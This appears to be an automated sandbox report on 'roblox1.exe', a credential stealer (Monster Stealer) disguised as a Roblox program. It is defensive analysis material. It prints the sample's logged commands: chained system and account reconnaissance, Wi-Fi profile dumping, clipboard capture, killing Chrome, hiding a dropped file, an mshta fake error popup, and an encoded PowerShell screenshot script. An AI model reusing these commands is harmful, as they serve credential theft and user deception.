
Windows Analysis Report
roblox1.exe

Overview

General Information

Sample name: roblox1.exe
Analysis ID: 1577530
MD5: cd463d16cf57c3a9f5c9588a878a7213
SHA1: ef22c2b11efc0bc6a739b82f9a26edaee9348b8f
SHA256: 49f4789274e5c0dcd4d2cc1b850761353bf8b72e819d12df5c376fd665da1283
Tags: 18521511316185215113209 bulletproof exe PythonStealer user-abus3reports
Infos:

Detection

Python Stealer, Monster Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Monster Stealer
AI detected suspicious sample
Bypasses PowerShell execution policy
Detected generic credential text file
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Gathers network related connection and port information
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the windows firewall
Overwrites the password of the administrator account
Performs a network lookup / discovery via ARP
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
Sigma detected: MSHTA Suspicious Execution 01
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses attrib.exe to hide files
Uses ipconfig to lookup or modify the Windows network settings
Uses netsh to modify the Windows network and firewall settings
Uses netstat to query active network connections and open ports
Yara detected Generic Python Stealer
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Console CodePage Lookup Via CHCP
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • roblox1.exe (PID: 1364 cmdline: "C:\Users\user\Desktop\roblox1.exe" MD5: CD463D16CF57C3A9F5C9588A878A7213)
    • conhost.exe (PID: 5876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • stub.exe (PID: 3428 cmdline: C:\Users\user\Desktop\roblox1.exe MD5: 6FE46FD6E5B143F5114E6616C59B703C)
      • cmd.exe (PID: 5384 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 5072 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • WMIC.exe (PID: 5168 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 3908 cmdline: C:\Windows\system32\cmd.exe /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • tasklist.exe (PID: 356 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 5040 cmdline: C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\MonsterUpdateService\Monster.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • attrib.exe (PID: 5452 cmdline: attrib +h +s "C:\Users\user\AppData\Local\MonsterUpdateService\Monster.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • cmd.exe (PID: 3488 cmdline: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • mshta.exe (PID: 2752 cmdline: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • cmd.exe (PID: 3260 cmdline: C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • taskkill.exe (PID: 5396 cmdline: taskkill /F /IM chrome.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • cmd.exe (PID: 768 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • tasklist.exe (PID: 5500 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 6488 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 5960 cmdline: powershell.exe Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 900 cmdline: C:\Windows\system32\cmd.exe /c "chcp" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • chcp.com (PID: 880 cmdline: chcp MD5: 33395C4732A49065EA72590B14B64F32)
      • cmd.exe (PID: 2036 cmdline: C:\Windows\system32\cmd.exe /c "chcp" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • chcp.com (PID: 4584 cmdline: chcp MD5: 33395C4732A49065EA72590B14B64F32)
      • cmd.exe (PID: 5224 cmdline: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • systeminfo.exe (PID: 6324 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
          • WmiPrvSE.exe (PID: 7140 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • HOSTNAME.EXE (PID: 5836 cmdline: hostname MD5: 33AFAA43B84BDEAB12E02F9DBD2B2EE0)
        • WMIC.exe (PID: 4916 cmdline: wmic logicaldisk get caption,description,providername MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • net.exe (PID: 6120 cmdline: net user MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 6864 cmdline: C:\Windows\system32\net1 user MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
          • conhost.exe (PID: 6864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • query.exe (PID: 2752 cmdline: query user MD5: 29043BC0B0F99EAFF36CAD35CBEE8D45)
          • quser.exe (PID: 356 cmdline: "C:\Windows\system32\quser.exe" MD5: 480868AEBA9C04CA04D641D5ED29937B)
        • net.exe (PID: 880 cmdline: net localgroup MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 5320 cmdline: C:\Windows\system32\net1 localgroup MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • net.exe (PID: 2788 cmdline: net localgroup administrators MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 1272 cmdline: C:\Windows\system32\net1 localgroup administrators MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • net.exe (PID: 768 cmdline: net user guest MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 3776 cmdline: C:\Windows\system32\net1 user guest MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • net.exe (PID: 6408 cmdline: net user administrator MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 1660 cmdline: C:\Windows\system32\net1 user administrator MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • WMIC.exe (PID: 7100 cmdline: wmic startup get caption,command MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • tasklist.exe (PID: 5712 cmdline: tasklist /svc MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • ipconfig.exe (PID: 5896 cmdline: ipconfig /all MD5: 62F170FB07FDBB79CEB7147101406EB8)
        • ROUTE.EXE (PID: 5996 cmdline: route print MD5: 3C97E63423E527BA8381E81CBA00B8CD)
        • ARP.EXE (PID: 5976 cmdline: arp -a MD5: 2AF1B2C042B83437A4BE82B19749FA98)
        • NETSTAT.EXE (PID: 3500 cmdline: netstat -ano MD5: 7FDDD6681EA81CE26E64452336F479E6)
        • sc.exe (PID: 7116 cmdline: sc query type= service state= all MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • netsh.exe (PID: 4648 cmdline: netsh firewall show state MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
        • netsh.exe (PID: 900 cmdline: netsh firewall show config MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 6168 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • netsh.exe (PID: 1660 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 4784 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • WMIC.exe (PID: 4352 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 2660 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAVwBpAHQAaABQAGEAcgB0AGkAYQBsAE4AYQBtAGUAKAAiAFMAeQBzAHQAZQBtAC4ARAByAGEAdwBpAG4AZwAiACkADQAKAGYAdQBuAGMAdABpAG8AbgAgAHMAYwByAGUAZQBuAHMAaABvAHQAKABbAEQAcgBhAHcAaQBuAGcALgBSAGUAYwB0AGEAbgBnAGwAZQBdACQAYgBvAHUAbgBkAHMALAAgACQAcABhAHQAaAApACAAewANAAoAIAAgACAAJABiAG0AcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAARAByAGEAdwBpAG4AZwAuAEIAaQB0AG0AYQBwACAAJABiAG8AdQBuAGQAcwAuAHcAaQBkAHQAaAAsACAAJABiAG8AdQBuAGQAcwAuAGgAZQBpAGcAaAB0AA0ACgAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBHAHIAYQBwAGgAaQBjAHMAXQA6ADoARgByAG8AbQBJAG0AYQBnAGUAKAAkAGIAbQBwACkADQAKAA0ACgAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoACQAYgBvAHUAbgBkAHMALgBMAG8AYwBhAHQAaQBvAG4ALAAgAFsARAByAGEAdwBpAG4AZwAuAFAAbwBpAG4AdABdADoAOgBFAG0AcAB0AHkALAAgACQAYgBvAHUAbgBkAHMALgBzAGkAegBlACkADQAKAA0ACgAgACAAIAAkAGIAbQBwAC4AUwBhAHYAZQAoACQAcABhAHQAaAApAA0ACgANAAoAIAAgACAAJABnAHIAYQBwAGgAaQBjAHMALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAIAAgACAAJABiAG0AcAAuAEQAaQBzAHAAbwBzAGUAKAApAA0ACgB9AA0ACgANAAoAJABiAG8AdQBuAGQAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBSAGUAYwB0AGEAbgBnAGwAZQBdADoAOgBGAHIAbwBtAEwAVABSAEIAKAAwACwAIAAwACwAIAAxADkAMgAwACwAIAAxADAAOAAwACkADQAKACQAcABhAHQAaAAgAD0AIAAoAEcAZQB0AC0ASQB0AGUAbQAgAC4AKQAuAEYAdQBsAGwATgBhAG0AZQArACIAXABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AcABuAGcAIgANAAoAcwBjAHIAZQBlAG4AcwBoAG8AdAAgACQAYgBvAHUAbgBkAHMAIAAkAHAAYQB0AGgA" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 4424 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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 MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 5844 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • WMIC.exe (PID: 3908 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | JoeSecurity_GenericPythonStealer | Yara detected Generic Python Stealer | Joe Security |
C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | JoeSecurity_MonsterStealer | Yara detected Monster Stealer | Joe Security |
C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp | JoeSecurity_GenericPythonStealer | Yara detected Generic Python Stealer | Joe Security |
00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp | JoeSecurity_MonsterStealer | Yara detected Monster Stealer | Joe Security |
00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000003.00000002.1951447889.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp | JoeSecurity_GenericPythonStealer | Yara detected Generic Python Stealer | Joe Security |

                  System Summary

Source: Process started; Author: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule); Data: Command: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()", CommandLine: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()", CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3488, ParentProcessName: cmd.exe, ProcessCommandLine: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()", ProcessId: 2752, ProcessName: mshta.exe
Source: Threat created; Author: Perez Diego (@darkquassar), oscd.community; Data: EventID: 8, SourceImage: C:\Windows\System32\wbem\WMIC.exe, SourceProcessId: 3908, StartAddress: CAE632B0, TargetImage: C:\Windows\System32\cmd.exe, TargetProcessId: 3908
Source: Process started; Author: frack113; Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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, CommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAVwBpAHQAaABQAGEAcgB0AGkAYQBsAE4AYQBtAGUAKAAiAFMAeQBzAHQAZQBtAC4ARAByAGEAdwBpAG4AZwAiACkADQAKAGYAdQBuAGMAdABpAG8AbgAgAHMAYwByAGUAZQBuAHMAaABvAHQAKABbAEQAcgBhAHcAaQBuAGcALgBSAGUAYwB0AGEAbgBnAGwAZQBdACQAYgBvAHUAbgBkAHMALAAgACQAcABhAHQAaAApACAAewANAAoAIAAgACAAJABiAG0AcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAARAByAGEAdwBpAG4AZwAuAEIAaQB0AG0AYQBwACAAJABiAG8AdQBuAGQAcwAuAHcAaQBkAHQAaAAsACAAJABiAG8AdQBuAGQAcwAuAGgAZQBpAGcAaAB0AA0ACgAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBHAHIAYQBwAGgAaQBjAHMAXQA6ADoARgByAG8AbQBJAG0AYQBnAGUAKAAkAGIAbQBwACkADQAKAA0ACgAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoACQAYgBvAHUAbgBkAHMALgBMAG8AYwBhAHQAaQBvAG4ALAAgAFsARAByAGEAdwBpAG4AZwAuAFAAbwBpAG4AdABdADoAOgBFAG0AcAB0AHkALAAgACQAYgBvAHUAbgBkAHMALgBzAGkAegBlACkADQAKAA0ACgAgACAAIAAkAGIAbQBwAC4AUwBhAHYAZQAoACQAcABhAHQAaAApAA0ACgANAAoAIAAgACAAJABnAHIAYQBwAGgAaQBjAHMALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAIAAgACAAJABiAG0AcAAuAEQAaQBzAHAAbwBzAGUAKAApAA0ACgB9AA0ACgANAAoAJABiAG8AdQBuAGQAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBSAGUAYwB0AGEAbgBnAGwAZQBdADoAOgBGAHIAbwBtAEwAVABSAEIAKAAwACwAIAAwACwAIAAxADkAMgAwACwAIAAxADAAOAAwACkADQAKACQAcABhAHQAaAAgAD0AIAAoAEcAZQB0AC0ASQB0AGUAbQAgAC4AKQAuAEYAdQBsAGwATgBhAG0AZQArACIAXABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AcABuAGcAIgANAAoAcwBjAHIAZQBlAG4AcwBoAG8AdAAgACQAYgBvAHUAbgBkAHMAIAAkAHAAYQB0AGgA, Comm
Source: Process started; Author: _pete_0, TheDFIRReport; Data: Command: chcp, CommandLine: chcp, CommandLine|base64offset|contains: r), Image: C:\Windows\System32\chcp.com, NewProcessName: C:\Windows\System32\chcp.com, OriginalFileName: C:\Windows\System32\chcp.com, ParentCommandLine: C:\Windows\system32\cmd.exe /c "chcp", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 900, ParentProcessName: cmd.exe, ProcessCommandLine: chcp, ProcessId: 880, ProcessName: chcp.com
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Desktop\roblox1.exe, ParentImage: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe, ParentProcessId: 3428, ParentProcessName: stub.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard", ProcessId: 6488, ProcessName: cmd.exe
Source: Process started; Author: frack113; Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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, CommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAVwBpAHQAaABQAGEAcgB0AGkAYQBsAE4AYQBtAGUAKAAiAFMAeQBzAHQAZQBtAC4ARAByAGEAdwBpAG4AZwAiACkADQAKAGYAdQBuAGMAdABpAG8AbgAgAHMAYwByAGUAZQBuAHMAaABvAHQAKABbAEQAcgBhAHcAaQBuAGcALgBSAGUAYwB0AGEAbgBnAGwAZQBdACQAYgBvAHUAbgBkAHMALAAgACQAcABhAHQAaAApACAAewANAAoAIAAgACAAJABiAG0AcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAARAByAGEAdwBpAG4AZwAuAEIAaQB0AG0AYQBwACAAJABiAG8AdQBuAGQAcwAuAHcAaQBkAHQAaAAsACAAJABiAG8AdQBuAGQAcwAuAGgAZQBpAGcAaAB0AA0ACgAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBHAHIAYQBwAGgAaQBjAHMAXQA6ADoARgByAG8AbQBJAG0AYQBnAGUAKAAkAGIAbQBwACkADQAKAA0ACgAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoACQAYgBvAHUAbgBkAHMALgBMAG8AYwBhAHQAaQBvAG4ALAAgAFsARAByAGEAdwBpAG4AZwAuAFAAbwBpAG4AdABdADoAOgBFAG0AcAB0AHkALAAgACQAYgBvAHUAbgBkAHMALgBzAGkAegBlACkADQAKAA0ACgAgACAAIAAkAGIAbQBwAC4AUwBhAHYAZQAoACQAcABhAHQAaAApAA0ACgANAAoAIAAgACAAJABnAHIAYQBwAGgAaQBjAHMALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAIAAgACAAJABiAG0AcAAuAEQAaQBzAHAAbwBzAGUAKAApAA0ACgB9AA0ACgANAAoAJABiAG8AdQBuAGQAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBSAGUAYwB0AGEAbgBnAGwAZQBdADoAOgBGAHIAbwBtAEwAVABSAEIAKAAwACwAIAAwACwAIAAxADkAMgAwACwAIAAxADAAOAAwACkADQAKACQAcABhAHQAaAAgAD0AIAAoAEcAZQB0AC0ASQB0AGUAbQAgAC4AKQAuAEYAdQBsAGwATgBhAG0AZQArACIAXABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AcABuAGcAIgANAAoAcwBjAHIAZQBlAG4AcwBoAG8AdAAgACQAYgBvAHUAbgBkAHMAIAAkAHAAYQB0AGgA, Comm
Source: Process started; Author: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems); Data: Command: net localgroup administrators, CommandLine: net localgroup administrators, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5224, ParentProcessName: cmd.exe, ProcessCommandLine: net localgroup administrators, ProcessId: 2788, ProcessName: net.exe
Source: Process started; Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community; Data: Command: net user, CommandLine: net user, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5224, ParentProcessName: cmd.exe, ProcessCommandLine: net user, ProcessId: 6120, ProcessName: net.exe
Source: Process started; Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements); Data: Command: net user, CommandLine: net user, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5224, ParentProcessName: cmd.exe, ProcessCommandLine: net user, ProcessId: 6120, ProcessName: net.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell.exe Get-Clipboard, CommandLine: powershell.exe Get-Clipboard, CommandLine|base64offset|contains: ~Xn, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6488, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe Get-Clipboard, ProcessId: 5960, ProcessName: powershell.exe
